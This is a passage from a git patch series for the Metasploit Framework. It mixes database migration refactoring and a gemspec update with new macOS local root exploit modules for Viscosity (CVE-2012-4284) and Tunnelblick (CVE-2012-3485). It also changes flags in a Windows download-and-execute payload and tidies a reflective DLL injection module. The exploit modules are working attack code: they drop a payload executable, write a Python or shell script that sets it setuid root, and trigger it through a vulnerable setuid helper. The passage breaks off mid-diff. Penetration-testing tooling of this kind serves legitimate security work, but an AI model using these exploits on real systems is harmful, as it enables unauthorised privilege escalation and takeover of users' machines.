"index_web_pages_on_path" + add_index "web_pages", ["query"], :name => "index_web_pages_on_query" + + create_table "web_sites", :force => true do |t| + t.integer "service_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "vhost", :limit => 2048 + t.text "comments" + t.text "options" + end + + add_index "web_sites", ["comments"], :name => "index_web_sites_on_comments" + add_index "web_sites", ["options"], :name => "index_web_sites_on_options" + add_index "web_sites", ["vhost"], :name => "index_web_sites_on_vhost" + + create_table "web_templates", :force => true do |t| + t.string "name", :limit => 512 + t.string "title", :limit => 512 + t.string "body", :limit => 524288 + t.integer "campaign_id" + t.text "prefs" + end + + create_table "web_vulns", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path", :null => false + t.string "method", :limit => 1024, :null => false + t.text "params", :null => false + t.text "pname", :null => false + t.integer "risk", :null => false + t.string "name", :limit => 1024, :null => false + t.text "query" + t.text "category", :null => false + t.text "confidence", :null => false + t.text "description" + t.text "blame" + t.binary "request" + t.binary "proof", :null => false + t.string "owner" + t.text "payload" + end + + add_index "web_vulns", ["method"], :name => "index_web_vulns_on_method" + add_index "web_vulns", ["name"], :name => "index_web_vulns_on_name" + add_index "web_vulns", ["path"], :name => "index_web_vulns_on_path" + + create_table "wmap_requests", :force => true do |t| + t.string "host" + t.string "address", :limit => nil + t.integer "port" + t.integer "ssl" + t.string "meth", :limit => 32 + t.text "path" + t.text "headers" + t.text "query" + t.text "body" + t.string "respcode", :limit => 16 + t.text "resphead" + t.text "response" + t.datetime "created_at" + t.datetime "updated_at" + end + + create_table "wmap_targets", :force => true do |t| + t.string "host" + t.string "address", :limit => nil + t.integer "port" + t.integer "ssl" + t.integer "selected" + t.datetime "created_at" + t.datetime "updated_at" + end + + create_table "workspace_members", :id => false, :force => true do |t| + t.integer "workspace_id", :null => false + t.integer "user_id", :null => false + end + + create_table "workspaces", :force => true do |t| + t.string "name" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "boundary", :limit => 4096 + t.string "description", :limit => 4096 + t.integer "owner_id" + t.boolean "limit_to_network", :default => false, :null => false + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb similarity index 96% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb index 66d1de6804..32b4bef890 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb @@ -11,6 +11,8 @@ Bundler.require(:default, :test) # full backtrace in logs so its easier to trace errors Rails.backtrace_cleaner.remove_silencers! +require 'simplecov' + # Requires supporting ruby files with custom matchers and macros, etc, # in spec/support/ and its subdirectories. support_glob = MetasploitDataModels.root.join('spec', 'support', '**', '*.rb') diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec similarity index 72% rename from lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec rename to lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec index 7b728268c3..a88f2d9cd0 100644 --- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec +++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec @@ -2,11 +2,11 @@ Gem::Specification.new do |s| s.name = "metasploit_data_models" - s.version = "0.3.0" + s.version = "0.5.1" s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= s.authors = ["Trevor Rosen"] - s.date = "2012-11-01" + s.date = "2013-03-01" s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions." s.email = ["trevor_rosen@rapid7.com"] s.executables = ["mdm_console"] @@ -21,20 +21,26 @@ Gem::Specification.new do |s| if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then s.add_development_dependency(%q, [">= 0"]) - s.add_runtime_dependency(%q, [">= 0"]) + s.add_development_dependency(%q, [">= 0"]) + s.add_development_dependency(%q, [">= 0"]) + s.add_runtime_dependency(%q, [">= 3.2.10"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) else s.add_dependency(%q, [">= 0"]) - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 3.2.10"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) end else s.add_dependency(%q, [">= 0"]) - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 3.2.10"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) From af4b3fa287e3d642c5d1bcc995b0ac89803b1a40 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Sat, 2 Mar 2013 20:33:48 -0600 Subject: [PATCH 57/87] Use ActiveRecord::Migrator multiple migrations paths support [#44034071] ActiveRecord::Migrator has a class attribute, migrations_paths, specificially for storing a list of different directories that have migrations in them. ActiveRecord::Migrator.migrations_paths is used in rake db:load_config, which is a dependency of db:migrate, etc. that is passed to ActiveRecord::Migrator.migrate. Since migrate supports an array of directories, and not just a single directory, there is no need to merge all the migrations paths into one temporary directory as was previously done. --- lib/msf/core/db_manager.rb | 75 ++++++++++++++---------------------- lib/msf/ui/console/driver.rb | 4 +- 2 files changed, 31 insertions(+), 48 deletions(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 42974b229a..287442150b 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -56,9 +56,6 @@ class DBManager # Flag to indicate database migration has completed attr_accessor :migrated - # Array of additional migration paths - attr_accessor :migration_paths - # Flag to indicate that modules are cached attr_accessor :modules_cached @@ -69,7 +66,6 @@ class DBManager self.framework = framework self.migrated = false - self.migration_paths = [] self.modules_cached = false self.modules_caching = false @@ -82,17 +78,17 @@ class DBManager end initialize_database_support - - # have to set migration paths after initialize_database_support as it loads - # MetasploitDataModels. - self.migration_paths << MetasploitDataModels.root.join('db', 'migrate').to_s end - # - # Add additional migration paths - # - def add_migration_path(path) - self.migration_paths.push(path) + def initialize_metasploit_data_models + # Provide access to ActiveRecord models shared w/ commercial versions + require "metasploit_data_models" + + metasploit_data_model_migrations_pathname = MetasploitDataModels.root.join( + 'db', + 'migrate' + ) + ActiveRecord::Migrator.migrations_paths << metasploit_data_model_migrations_pathname.to_s end # @@ -105,8 +101,7 @@ class DBManager require "active_record" - # Provide access to ActiveRecord models shared w/ commercial versions - require "metasploit_data_models" + initialize_metasploit_data_models # Patches issues with ActiveRecord require "msf/core/patches/active_record" @@ -283,45 +278,31 @@ class DBManager end end + # Migrate database to latest schema version. # - # Migrate database to latest schema version + # @param verbose [Boolean] see ActiveRecord::Migration.verbose + # @return [Array] List of migrations that ran. # + # @see ActiveRecord::Migrator.migrate def migrate(verbose=false) + ran = [] + ActiveRecord::Migration.verbose = verbose - temp_dir = ::File.expand_path(::File.join( Msf::Config.config_directory, "schema", "#{Time.now.to_i}_#{$$}" )) - ::FileUtils.rm_rf(temp_dir) - ::FileUtils.mkdir_p(temp_dir) - - self.migration_paths.each do |mpath| - dir = Dir.new(mpath) rescue nil - if not dir - elog("Could not access migration path #{mpath}") - next - end - - dir.entries.each do |ent| - next unless ent =~ /^\d+.*\.rb$/ - ::FileUtils.cp( ::File.join(mpath, ent), ::File.join(temp_dir, ent) ) + ActiveRecord::Base.connection_pool.with_connection do + begin + ran = ActiveRecord::Migrator.migrate( + ActiveRecord::Migrator.migrations_paths + ) + # ActiveRecord::Migrator#migrate rescues all errors and re-raises them as + # StandardError + rescue StandardError => error + self.error = error + elog("DB.migrate threw an exception: #{error}") + dlog("Call stack:\n#{error.backtrace.join "\n"}") end end - success = true - begin - - ::ActiveRecord::Base.connection_pool.with_connection { - ActiveRecord::Migration.verbose = verbose - ActiveRecord::Migrator.migrate(temp_dir, nil) - } - rescue ::Exception => e - self.error = e - elog("DB.migrate threw an exception: #{e}") - dlog("Call stack:\n#{e.backtrace.join "\n"}") - success = false - end - - ::FileUtils.rm_rf(temp_dir) - - return true + return ran end def workspace=(workspace) diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index 49d9698482..10c2836a80 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -171,7 +171,9 @@ class Driver < Msf::Ui::Driver # Append any migration paths necessary to bring the database online if opts['DatabaseMigrationPaths'] - opts['DatabaseMigrationPaths'].each {|m| framework.db.add_migration_path(m) } + opts['DatabaseMigrationPaths'].each do |migrations_path| + ActiveRecord::Migrator.migrations_paths << migrations_path + end end # Look for our database configuration in the following places, in order: From c9a162ac33551372096fd0e1f3b3c7877eec6a0e Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Sat, 2 Mar 2013 21:09:45 -0600 Subject: [PATCH 58/87] Correct return type of Msf::DBManager#migrate. --- lib/msf/core/db_manager.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 287442150b..6b54c9f7a9 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -281,7 +281,7 @@ class DBManager # Migrate database to latest schema version. # # @param verbose [Boolean] see ActiveRecord::Migration.verbose - # @return [Array] List of migrations that ran. + # @return [Array Date: Sat, 2 Mar 2013 21:16:02 -0600 Subject: [PATCH 59/87] Document Msf::DBManager#initialize_metasploit_data_models --- lib/msf/core/db_manager.rb | 25 ++++++++++++++----------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 6b54c9f7a9..726eb682f7 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -80,17 +80,6 @@ class DBManager initialize_database_support end - def initialize_metasploit_data_models - # Provide access to ActiveRecord models shared w/ commercial versions - require "metasploit_data_models" - - metasploit_data_model_migrations_pathname = MetasploitDataModels.root.join( - 'db', - 'migrate' - ) - ActiveRecord::Migrator.migrations_paths << metasploit_data_model_migrations_pathname.to_s - end - # # Do what is necessary to load our database support # @@ -166,6 +155,20 @@ class DBManager $KCODE = 'NONE' if RUBY_VERSION =~ /^1\.8\./ end + # Loads Metasploit Data Models and adds its migrations to migrations paths. + # + # @return [void] + def initialize_metasploit_data_models + # Provide access to ActiveRecord models shared w/ commercial versions + require "metasploit_data_models" + + metasploit_data_model_migrations_pathname = MetasploitDataModels.root.join( + 'db', + 'migrate' + ) + ActiveRecord::Migrator.migrations_paths << metasploit_data_model_migrations_pathname.to_s + end + # # Create a new database sink and initialize it # From ecdb884b1326afa6bcb82b8d6074e7e0f32119c7 Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Sun, 3 Mar 2013 01:42:17 -0500 Subject: [PATCH 60/87] Make download_exec work with authenticated proxies Adds INTERNET_FLAG_KEEP_CONNECTION to HttpOpenRequest flags to allow download_exec to transparently authenticate to a proxy device through wininet. Fun trivia, Windows 7 systems uses Connection: keep-alive by default. This flag benefits older targets (e.g., Windows XP). --- modules/payloads/singles/windows/download_exec.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index 3d6b096e57..68928dc730 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -46,6 +46,7 @@ module Metasploit3 #;0x80000000 | ; INTERNET_FLAG_RELOAD #;0x04000000 | ; INTERNET_NO_CACHE_WRITE #;0x00800000 | ; INTERNET_FLAG_SECURE + #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION #;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT #;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID #;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID @@ -89,7 +90,7 @@ module Metasploit3 if target_uri =~ /^http:/ proto = "http" port_nr = 80 - dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" + dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" end if target_uri =~ /^ftp:/ From 1cc49f75f52fd9ed7c4e1c11a7ac8c8a5206a596 Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Sun, 3 Mar 2013 03:26:43 -0500 Subject: [PATCH 61/87] move flag comment to where it's used. --- modules/payloads/singles/windows/download_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index 68928dc730..d0d68fe3b1 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -46,7 +46,6 @@ module Metasploit3 #;0x80000000 | ; INTERNET_FLAG_RELOAD #;0x04000000 | ; INTERNET_NO_CACHE_WRITE #;0x00800000 | ; INTERNET_FLAG_SECURE - #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION #;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT #;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID #;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID @@ -91,6 +90,7 @@ module Metasploit3 proto = "http" port_nr = 80 dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" + #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION end if target_uri =~ /^ftp:/ From 76180f22fcb5a69e12239278783ab37db5d5143b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 3 Mar 2013 13:23:21 +0100 Subject: [PATCH 62/87] added module for cve-2012-4284 --- .../exploits/osx/local/setuid_viscosity.rb | 122 ++++++++++++++++++ 1 file changed, 122 insertions(+) create mode 100644 modules/exploits/osx/local/setuid_viscosity.rb diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb new file mode 100644 index 0000000000..c068b4c3a1 --- /dev/null +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -0,0 +1,122 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/linux/priv' +require 'msf/core/exploit/exe' + + +class Metasploit4 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'Setuid Viscosity Exploit', + 'Description' => %q{ + This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The + vulnerability exists in the setuid ViscosityHelper, where an insufficient + validation of path names allows execution of arbitrary python code as root. + This module has been tested successfully on Viscosity 1.4.1 over Mac OS X + 10.7.5. + }, + 'References' => + [ + [ 'CVE', '2012-4284' ], + [ 'OSVDB', '84709' ], + [ 'EDB', '20485' ], + [ 'URL', 'http://blog.zx2c4.com/791' ] + ], + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jason A. Donenfeld', # Vulnerability discovery and original Exploit + 'juan vazquez' # Metasploit module + ], + 'DisclosureDate' => 'Aug 12 2012', + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell' ], + 'Targets' => + [ + [ 'Viscosity 1.4.1 / Mac OS X x86', { 'Arch' => ARCH_X86 } ], + [ 'Viscosity 1.4.1 / Mac OS X x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, + 'DefaultTarget' => 0 + })) + register_options([ + # These are not OptPath becuase it's a *remote* path + OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), + OptString.new("Viscosity", [ true, "Path to setuid nmap executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) + ], self.class) + end + + def check + if not file?(datastore["Viscosity"]) + print_error "ViscosityHelper not found" + return CheckCode::Safe + end + + check = session.shell_command_token("find #{datastore["Viscosity"]} -type f -user root -perm -4000") + + if check =~ /ViscosityHelper/ + return CheckCode::Vulnerable + end + + return CheckCode::Safe + end + + def clean + file_rm(@link) + file_rm(@python_file) + file_rm("#{@python_file}c") + file_rm(@exe_file) + end + + def exploit + + exe_name = rand_text_alpha(8) + @exe_file = "#{datastore["WritableDir"]}/#{exe_name}" + print_status("Dropping executable #{@exe_file}") + write_file(@exe_file, generate_payload_exe) + + evil_python = %Q{ +import os +os.setuid(0) +os.setgid(0) +os.system("chown root #{@exe_file}") +os.system("chmod 6777 #{@exe_file}") +os.execl("#{@exe_file}", "#{exe_name}") + } + @python_file = "#{datastore["WritableDir"]}/site.py" + print_status("Dropping python #{@python_file}...") + write_file(@python_file, evil_python) + + print_status("Creating symlink...") + link_name = rand_text_alpha(8) + @link = "#{datastore["WritableDir"]}/#{link_name}" + cmd_exec "ln -s -f -v #{datastore["Viscosity"]} #{@link}" + + print_status("Running...") + begin + cmd_exec "#{@link}" + rescue + print_error("Failed. Cleaning files #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}...") + clean + return + end + print_warning("Remember to clean files: #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}") + end +end + From 81e2dbc71e5d69128e108c73cf0de2e2a70c281b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 3 Mar 2013 19:48:12 +0100 Subject: [PATCH 63/87] added module for CVE-2012-3485 --- .../exploits/osx/local/setuid_tunnelblick.rb | 121 ++++++++++++++++++ 1 file changed, 121 insertions(+) create mode 100644 modules/exploits/osx/local/setuid_tunnelblick.rb diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb new file mode 100644 index 0000000000..66db2db4d9 --- /dev/null +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -0,0 +1,121 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/exploit/exe' + +class Metasploit4 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'Setuid Tunnelblick Exploit', + 'Description' => %q{ + This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The + vulnerability exists in the setuid openvpnstart, where an insufficient + validation of path names allows execution of arbitrary shell scripts as root. + This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 + over Mac OS X 10.7.5. + }, + 'References' => + [ + [ 'CVE', '2012-3485' ], + [ 'EDB', '20443' ], + [ 'URL', 'http://blog.zx2c4.com/791' ] + ], + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jason A. Donenfeld', # Vulnerability discovery and original Exploit + 'juan vazquez' # Metasploit module + ], + 'DisclosureDate' => 'Aug 11 2012', + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell' ], + 'Targets' => + [ + [ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ], + [ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, + 'DefaultTarget' => 0 + })) + register_options([ + # These are not OptPath becuase it's a *remote* path + OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), + OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ]) + ], self.class) + end + + def check + if not file?(datastore["Tunnelblick"]) + print_error "openvpnstart not found" + return CheckCode::Safe + end + + check = session.shell_command_token("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000") + + if check =~ /openvpnstart/ + return CheckCode::Vulnerable + end + + return CheckCode::Safe + end + + def clean + file_rm(@link) + cmd_exec("rm -rf #{datastore["WritableDir"]}/openvpn") + end + + def exploit + + print_status("Creating directory...") + cmd_exec "mkdir -p #{datastore["WritableDir"]}/openvpn/openvpn-0" + + exe_name = rand_text_alpha(8) + @exe_file = "#{datastore["WritableDir"]}/openvpn/openvpn-0/#{exe_name}" + print_status("Dropping executable #{@exe_file}") + write_file(@exe_file, generate_payload_exe) + cmd_exec "chmod +x #{@exe_file}" + + + evil_sh =< Date: Sun, 3 Mar 2013 19:52:31 +0100 Subject: [PATCH 64/87] fixed EOF --- modules/exploits/osx/local/setuid_tunnelblick.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index 66db2db4d9..e12441c14b 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -91,11 +91,10 @@ class Metasploit4 < Msf::Exploit::Local cmd_exec "chmod +x #{@exe_file}" - evil_sh =< Date: Sun, 3 Mar 2013 19:54:17 +0100 Subject: [PATCH 65/87] minor fixes --- modules/exploits/osx/local/setuid_viscosity.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index c068b4c3a1..4c674f2f07 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -9,10 +9,8 @@ require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' -require 'msf/core/post/linux/priv' require 'msf/core/exploit/exe' - class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking @@ -58,7 +56,7 @@ class Metasploit4 < Msf::Exploit::Local register_options([ # These are not OptPath becuase it's a *remote* path OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), - OptString.new("Viscosity", [ true, "Path to setuid nmap executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) + OptString.new("Viscosity", [ true, "Path to setuid ViscosityHelper executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) ], self.class) end @@ -91,14 +89,15 @@ class Metasploit4 < Msf::Exploit::Local print_status("Dropping executable #{@exe_file}") write_file(@exe_file, generate_payload_exe) - evil_python = %Q{ + evil_python =<<-EOF import os os.setuid(0) os.setgid(0) os.system("chown root #{@exe_file}") os.system("chmod 6777 #{@exe_file}") os.execl("#{@exe_file}", "#{exe_name}") - } + EOF + @python_file = "#{datastore["WritableDir"]}/site.py" print_status("Dropping python #{@python_file}...") write_file(@python_file, evil_python) From 6d811ce4b92dc45620c1bdcceca79eee0162c2e4 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Mar 2013 09:09:11 -0600 Subject: [PATCH 66/87] empty passwords should be allowed --- lib/rex/proto/http/client.rb | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 4a8d8108f3..3461a0067e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -262,15 +262,9 @@ class Client if opts['username'].nil? or opts['username'] == '' if self.username and not (self.username == '') opts['username'] = self.username - else - opts['username'] = nil - end - end - - if opts['password'].nil? or opts['password'] == '' - if self.password and not (self.password == '') opts['password'] = self.password else + opts['username'] = nil opts['password'] = nil end end From 92ee4300dfe8616ff711a18796be8817c48f96a4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 4 Mar 2013 17:40:09 +0100 Subject: [PATCH 67/87] cleanup for reflective_dll_inject --- .../windows/manage/reflective_dll_inject.rb | 29 ++++++++++--------- 1 file changed, 16 insertions(+), 13 deletions(-) diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index ac7d447afe..7f9a39ab2e 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb @@ -12,15 +12,18 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Manage Reflective DLL Injection Module', - 'Description' => %q{ + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ This module will inject into the memory of a process a specified Reflective DLL. }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Ben Campbell '], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ], - 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => + [ + [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] + ] )) register_options( @@ -49,7 +52,7 @@ class Metasploit3 < Msf::Post end end - raise "Can't find an exported 